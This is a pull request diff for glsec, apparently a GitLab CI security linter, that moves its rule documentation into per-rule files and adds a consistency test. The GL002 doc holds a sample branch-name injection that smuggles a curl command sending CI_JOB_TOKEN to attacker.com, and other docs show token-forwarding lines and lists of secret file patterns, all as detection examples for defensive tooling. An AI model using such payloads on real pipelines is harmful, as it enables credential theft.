### PR TITLE
docs: move rule documentation to docs/rules/

### DIFF
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -102,7 +102,19 @@ func All() []rule.Rule {
 }
 ```
 
-### Step 4 — write tests
+### Step 4 — satisfy the consistency test
+
+`rules/consistency_test.go` runs automatically as part of `go test ./rules/` and enforces three invariants for every rule returned by `All()`:
+
+| Check | Requirement |
+|-------|-------------|
+| ID format | Must match `GL\d{3}` (e.g. `GL006`) |
+| Docs file | `docs/rules/GLNNN.md` must exist and contain at least one `CICD-SEC-N` or `OWASP` reference |
+| Fixture | At least one `testdata/fixtures/glnnn-*.yml` file must exist (lowercase rule ID as prefix) |
+
+All three must be in place before the test suite passes.
+
+### Step 5 — write unit tests
 
 ```go
 // rules/gl006_test.go
@@ -141,13 +153,21 @@ func TestGL006_Clean(t *testing.T) {
 
 Cover the happy path (flagged), the clean path, and any edge cases (empty values, missing keys, nested structures).
 
-### Step 5 — add a fixture
+### Step 6 — add a fixture
 
 Create `testdata/fixtures/glNNN-short-name.yml` with a realistic example that exercises the rule. The fixture must be valid GitLab CI YAML — CI validates all fixtures against the GitLab CI JSON schema via `check-jsonschema`.
 
-### Step 6 — update the README
+### Step 7 — update the README and add a docs file
 
-Add a row to the rules table and a `### GLNNN` section with a flagged/safe example, following the pattern of the existing rules.
+Create `docs/rules/GLNNN.md` with the full rule documentation (see existing files for structure). Required sections:
+
+- Rule ID, severity, OWASP reference (`CICD-SEC-N`), zizmor analogue if applicable
+- Risk explanation
+- Trigger example (flagged YAML)
+- Safe alternative
+- Detection notes
+
+Add a row to the rules summary table in `README.md` linking to the new docs file.
 
 ## Commit and PR conventions
 

--- a/README.md
+++ b/README.md
@@ -56,139 +56,15 @@ glsec --format sarif .gitlab-ci.yml > gl.sarif
 
 ## Rules
 
-| ID | Severity | What it detects |
-|----|----------|----------------|
-| [GL001](#gl001-mutable-image-tag) | error | Mutable image tag (`latest`, no tag, non-SHA digest) |
-| [GL002](#gl002-variable-injection) | warn | User-controlled CI variable used unquoted in script |
-| [GL003](#gl003-unpinned-include-ref) | error | Remote `include:` with mutable or missing `ref` |
-| [GL004](#gl004-ci_job_token-exfiltration) | warn | `CI_JOB_TOKEN` forwarded to a non-GitLab host |
-| [GL005](#gl005-sensitive-artifacts) | warn | Sensitive file patterns in `artifacts:` or missing `expire_in` |
+| ID | Severity | Description |
+|----|----------|-------------|
+| [GL001](docs/rules/GL001.md) | `error` | Mutable image tag (`latest`, no tag, non-digest pin) |
+| [GL002](docs/rules/GL002.md) | `warn`  | User-controlled CI variable used unquoted in script |
+| [GL003](docs/rules/GL003.md) | `error` | Remote `include:` with mutable or missing `ref` |
+| [GL004](docs/rules/GL004.md) | `warn`  | `CI_JOB_TOKEN` forwarded to a non-GitLab host |
+| [GL005](docs/rules/GL005.md) | `warn`  | Sensitive file patterns in `artifacts:` or missing `expire_in` |
 
----
-
-### GL001 — Mutable image tag
-
-Using `latest`, a branch name, or no tag at all means the image can change between pipeline runs without any code change. This can silently introduce malicious code into your build.
-
-**Flagged:**
-```yaml
-build:
-  image: node:latest        # mutable tag
-  script: [npm ci]
-
-test:
-  image: alpine             # no tag — defaults to latest
-  script: [./test.sh]
-```
-
-**Safe:**
-```yaml
-build:
-  image: node:20.11.0       # pinned version
-  script: [npm ci]
-
-test:
-  image: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b  # digest pin
-  script: [./test.sh]
-```
-
----
-
-### GL002 — Variable injection
-
-Several GitLab CI predefined variables are set from user-supplied data (branch name, MR title, commit message). Using them unquoted in `script:` allows an attacker who controls a branch name to inject arbitrary shell commands.
-
-**Flagged:**
-```yaml
-deploy:
-  script:
-    - echo $CI_COMMIT_REF_NAME        # unquoted — branch name is attacker-controlled
-    - ./deploy.sh $CI_MERGE_REQUEST_TITLE
-```
-
-**Safe:**
-```yaml
-deploy:
-  script:
-    - echo "$CI_COMMIT_REF_NAME"      # quoted — treated as a string, not parsed by shell
-    - ./deploy.sh "$CI_MERGE_REQUEST_TITLE"
-```
-
-User-controlled variables checked: `CI_COMMIT_REF_NAME`, `CI_COMMIT_BRANCH`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `CI_MERGE_REQUEST_TITLE`, `CI_MERGE_REQUEST_DESCRIPTION`, `CI_COMMIT_MESSAGE`, `CI_COMMIT_TITLE`.
-
----
-
-### GL003 — Unpinned include ref
-
-Including a remote template without pinning `ref` to a SHA means the template can change at any time, allowing a compromised upstream repository to inject malicious jobs into your pipeline.
-
-**Flagged:**
-```yaml
-include:
-  - project: company/ci-templates
-    file: /jobs/build.yml
-    # no ref — uses HEAD of default branch
-
-  - remote: https://example.com/template.yml   # URL content is mutable and unverified
-```
-
-**Safe:**
-```yaml
-include:
-  - project: company/ci-templates
-    file: /jobs/build.yml
-    ref: a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2   # full SHA pin
-```
-
-Local includes (`local:`) and GitLab-managed `template:` includes are not flagged.
-
----
-
-### GL004 — CI_JOB_TOKEN exfiltration
-
-`CI_JOB_TOKEN` grants access to your GitLab instance. Sending it to an external host — even in a header or query parameter — leaks credentials that can be used to read private repositories or trigger pipelines.
-
-**Flagged:**
-```yaml
-upload:
-  script:
-    - curl --header JOB-TOKEN=$CI_JOB_TOKEN https://external-registry.example.com/upload
-```
-
-**Safe:**
-```yaml
-upload:
-  script:
-    # use the GitLab Package Registry — stays on your GitLab instance
-    - curl --header JOB-TOKEN=$CI_JOB_TOKEN "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/..."
-```
-
----
-
-### GL005 — Sensitive artifacts
-
-Storing secrets in job artifacts exposes them to anyone with read access to the project. Missing `expire_in` keeps artifacts (and any secrets they contain) indefinitely.
-
-**Flagged:**
-```yaml
-build:
-  artifacts:
-    paths:
-      - .env              # environment file — may contain secrets
-      - deploy.pem        # private key
-    # no expire_in — artifacts kept forever
-```
-
-**Safe:**
-```yaml
-build:
-  artifacts:
-    paths:
-      - dist/
-    expire_in: 1 week
-```
-
-Sensitive patterns checked: `.env*`, `*.pem`, `*.key`, `*.p12`, `*.pfx`, `*.jks`, `id_rsa`, `id_ed25519`, `*.kube*`, `kubeconfig`, `*secret*`, `*credential*`, `*password*`.
+Each rule page contains the full risk description, trigger examples, safe alternatives, and detection notes.
 
 ---
 

--- a/docs/rules/GL001.md
+++ b/docs/rules/GL001.md
@@ -1,0 +1,43 @@
+# GL001 — Mutable image tag
+
+**Severity:** `error`  
+**OWASP:** CICD-SEC-3 (Dependency Chain Abuse)  
+**zizmor analogue:** `unpinned-images`
+
+## Risk
+
+Using `latest`, a branch name, or no tag at all means the image pulled by the runner can change between pipeline runs without any code change. A compromised or hijacked registry tag silently introduces malicious code into your build environment.
+
+## What is flagged
+
+- No tag: `image: alpine` (implicitly pulls `latest`)
+- Mutable tags: `latest`, `stable`, `edge`, `dev`, `main`, `master`, `nightly`, `rolling`, `canary`, `beta`, `alpha`
+- Applies to `image:` and `services:` at global, `default:`, and job level
+
+SHA256 digest pins (`@sha256:...`) are always safe and never flagged.
+
+## Trigger example
+
+```yaml
+build:
+  image: node:latest        # mutable tag
+
+test:
+  image: alpine             # no tag — defaults to latest
+  services:
+    - docker:dind           # variant tags (dind, alpine) are not flagged
+```
+
+## Safe alternative
+
+```yaml
+build:
+  image: node:20.11.0       # pinned version
+
+test:
+  image: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
+```
+
+## Notes
+
+Named variant tags such as `docker:dind`, `docker:alpine`, `python:3.11-slim` are **not** flagged — the part after the last `-` or before `:` is checked, not the full tag string.

--- a/docs/rules/GL002.md
+++ b/docs/rules/GL002.md
@@ -1,0 +1,46 @@
+# GL002 — Variable injection
+
+**Severity:** `warn`  
+**OWASP:** CICD-SEC-4 (Poisoned Pipeline Execution)  
+**zizmor analogue:** `template-injection`
+
+## Risk
+
+Several GitLab CI predefined variables are populated from user-supplied data: branch names, MR titles, commit messages. Using them unquoted in `script:` allows an attacker who controls a branch name or MR title to inject arbitrary shell commands into the pipeline.
+
+## User-controlled variables checked
+
+| Variable | Source |
+|----------|--------|
+| `CI_COMMIT_REF_NAME` | Branch or tag name |
+| `CI_COMMIT_BRANCH` | Branch name |
+| `CI_COMMIT_TAG` | Tag name |
+| `CI_COMMIT_MESSAGE` | Full commit message |
+| `CI_COMMIT_TITLE` | First line of commit message |
+| `CI_MERGE_REQUEST_TITLE` | MR title |
+| `CI_MERGE_REQUEST_DESCRIPTION` | MR description |
+| `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME` | Source branch of MR |
+
+## Trigger example
+
+```yaml
+deploy:
+  script:
+    - echo $CI_COMMIT_REF_NAME          # unquoted — shell-parses the branch name
+    - ./notify.sh $CI_MERGE_REQUEST_TITLE
+```
+
+A branch named `main; curl http://attacker.com/exfil?t=$CI_JOB_TOKEN` would execute the injected command.
+
+## Safe alternative
+
+```yaml
+deploy:
+  script:
+    - echo "$CI_COMMIT_REF_NAME"        # quoted — treated as a literal string
+    - ./notify.sh "$CI_MERGE_REQUEST_TITLE"
+```
+
+## Notes
+
+The rule flags any occurrence of a user-controlled variable that is **not immediately preceded by a double-quote** (`"`). Single-quoted strings in YAML are flagged unless the variable is also quoted within the shell command.

--- a/docs/rules/GL003.md
+++ b/docs/rules/GL003.md
@@ -1,0 +1,55 @@
+# GL003 — Unpinned include ref
+
+**Severity:** `error`  
+**OWASP:** CICD-SEC-3 (Dependency Chain Abuse), CICD-SEC-8 (Ungoverned Usage of 3rd Party Services)  
+**zizmor analogue:** `unpinned-uses`
+
+## Risk
+
+Including a remote template without pinning `ref` to a specific commit SHA means the template content can change at any time. A compromised upstream repository or a force-push to the referenced branch can inject malicious jobs into every pipeline that includes it — without touching the repository itself.
+
+## Include types and their treatment
+
+| Type | Treatment |
+|------|-----------|
+| `local:` | Always safe — file is in the same repository |
+| `template:` | Always safe — GitLab-managed, versioned with GitLab itself |
+| `component:` | Flagged if `@version` is missing or uses a mutable ref |
+| `project:` | Flagged if `ref:` is absent or points to a mutable branch |
+| `remote:` | Always flagged — URL content is unversioned and unverified |
+
+## Mutable refs (flagged)
+
+`main`, `master`, `develop`, `dev`, `HEAD`, `latest`, `stable`, `trunk`
+
+Everything else (version tags, SHAs) is trusted.
+
+## Trigger examples
+
+```yaml
+include:
+  - project: company/ci-templates
+    file: /jobs/build.yml
+    # no ref — defaults to HEAD of default branch
+
+  - project: company/ci-templates
+    file: /jobs/deploy.yml
+    ref: main                  # mutable branch ref
+
+  - remote: https://example.com/template.yml   # URL content is mutable and unverified
+```
+
+## Safe alternative
+
+```yaml
+include:
+  - project: company/ci-templates
+    file: /jobs/build.yml
+    ref: a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2   # full SHA pin
+
+  - component: gitlab.com/org/component/job@1.0.0   # pinned version tag
+```
+
+## Notes
+
+Requires GitLab 15.0+ for `component:` includes (see [#50](https://github.com/glsec/glsec/issues/50)).

--- a/docs/rules/GL004.md
+++ b/docs/rules/GL004.md
@@ -1,0 +1,41 @@
+# GL004 — CI_JOB_TOKEN exfiltration
+
+**Severity:** `warn`  
+**OWASP:** CICD-SEC-6 (Insufficient Credential Hygiene)
+
+## Risk
+
+`CI_JOB_TOKEN` grants scoped access to your GitLab instance — it can read private repositories, trigger pipelines, and access the Package Registry. Sending it to an external host leaks credentials that an attacker can use to move laterally within your GitLab instance.
+
+## What is flagged
+
+A script line is flagged when **both** of the following are present on the same line:
+
+1. `$CI_JOB_TOKEN` is referenced
+2. An explicit non-GitLab URL is also present (contains a hostname that is not `gitlab.com` or a `*.gitlab.com` subdomain)
+
+Lines that only use `CI_JOB_TOKEN` with GitLab-native variables (`$CI_API_V4_URL`, `$CI_SERVER_URL`, `$CI_REGISTRY`) are not flagged.
+
+## Trigger example
+
+```yaml
+upload:
+  script:
+    - curl --header "JOB-TOKEN: $CI_JOB_TOKEN" https://external-registry.example.com/upload
+```
+
+## Safe alternative
+
+```yaml
+upload:
+  script:
+    # Use the GitLab Package Registry — stays on your instance
+    - curl --header "JOB-TOKEN: $CI_JOB_TOKEN" \
+        "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/myapp/1.0/artifact.zip"
+```
+
+## Notes
+
+- GitLab.com and `*.gitlab.com` subdomains are always considered safe
+- Self-hosted GitLab instances contacted via `$CI_SERVER_URL` or `$CI_API_V4_URL` are safe
+- This rule does not flag token usage in `variables:` blocks — only in `script:`, `before_script:`, and `after_script:`

--- a/docs/rules/GL005.md
+++ b/docs/rules/GL005.md
@@ -1,0 +1,56 @@
+# GL005 — Sensitive artifacts
+
+**Severity:** `warn`  
+**OWASP:** CICD-SEC-6 (Insufficient Credential Hygiene)  
+**zizmor analogue:** `artipacked`
+
+## Risk
+
+Storing secrets in job artifacts exposes them to anyone with read access to the project and its pipelines. Missing `expire_in` keeps artifacts (and any secrets they contain) indefinitely, compounding the exposure window.
+
+## What is flagged
+
+**Sensitive file patterns in `artifacts: paths:`:**
+
+| Pattern | Examples |
+|---------|---------|
+| `.env*` | `.env`, `.env.production` |
+| `*.pem` | `cert.pem`, `ca.pem` |
+| `*.key` | `server.key`, `private.key` |
+| `*.p12`, `*.pfx`, `*.jks` | Certificate keystores |
+| `id_rsa`, `id_ed25519` | SSH private keys |
+| `*.kube*`, `kubeconfig` | Kubernetes config files |
+| `*secret*`, `*credential*`, `*password*` | Generic secret file names |
+
+**Missing `expire_in`:**
+
+Any `artifacts:` block without an `expire_in` key. Artifacts kept forever increase the blast radius of any sensitive content they contain.
+
+## Trigger example
+
+```yaml
+build:
+  artifacts:
+    paths:
+      - .env              # sensitive file pattern
+      - deploy.pem        # private key
+    # no expire_in — artifacts kept forever
+```
+
+## Safe alternative
+
+```yaml
+build:
+  artifacts:
+    paths:
+      - dist/
+      - build/
+    expire_in: 1 week
+```
+
+Never include secret files in artifact paths. Use [GitLab CI/CD variables](https://docs.gitlab.com/ci/variables/) with the Masked flag for secrets.
+
+## Notes
+
+- Pattern matching is case-insensitive and uses glob-style prefix/suffix matching
+- `expire_in` is flagged as a separate finding regardless of whether sensitive paths are present

--- a/rules/consistency_test.go
+++ b/rules/consistency_test.go
@@ -29,7 +29,7 @@ func TestRuleConsistency(t *testing.T) {
 func checkDocFile(t *testing.T, id string) {
 	t.Helper()
 	path := filepath.Join("..", "docs", "rules", id+".md")
-	content, err := os.ReadFile(path)
+	content, err := os.ReadFile(path) //nolint:gosec // G304: test reads known-safe local paths
 	if err != nil {
 		t.Errorf("missing docs/rules/%s.md", id)
 		return

--- a/rules/consistency_test.go
+++ b/rules/consistency_test.go
@@ -1,0 +1,52 @@
+package rules
+
+import (
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"testing"
+)
+
+var ruleIDPattern = regexp.MustCompile(`^GL\d{3}$`)
+
+func TestRuleConsistency(t *testing.T) {
+	for _, r := range All() {
+		r := r
+		t.Run(r.ID(), func(t *testing.T) {
+			id := r.ID()
+
+			if !ruleIDPattern.MatchString(id) {
+				t.Errorf("ID %q does not match GL### format", id)
+			}
+
+			checkDocFile(t, id)
+			checkFixture(t, id)
+		})
+	}
+}
+
+func checkDocFile(t *testing.T, id string) {
+	t.Helper()
+	path := filepath.Join("..", "docs", "rules", id+".md")
+	content, err := os.ReadFile(path)
+	if err != nil {
+		t.Errorf("missing docs/rules/%s.md", id)
+		return
+	}
+	if !strings.Contains(string(content), "CICD-SEC-") && !strings.Contains(string(content), "OWASP") {
+		t.Errorf("docs/rules/%s.md has no OWASP reference (add 'CICD-SEC-N' or 'OWASP')", id)
+	}
+}
+
+func checkFixture(t *testing.T, id string) {
+	t.Helper()
+	prefix := strings.ToLower(id) + "-"
+	matches, err := filepath.Glob(filepath.Join("..", "testdata", "fixtures", prefix+"*.yml"))
+	if err != nil {
+		t.Fatalf("glob error: %v", err)
+	}
+	if len(matches) == 0 {
+		t.Errorf("no fixture in testdata/fixtures/ matching %s*.yml", prefix)
+	}
+}


### PR DESCRIPTION
Closes #52

## What changed

- Created `docs/rules/GL001.md` – `GL005.md`, each with full risk description, trigger example, safe alternative, detection notes, OWASP category, and zizmor analogue
- README rules section reduced to a compact summary table with links to the per-rule docs — keeps the README readable as GL006–GL016 are added
- No code changes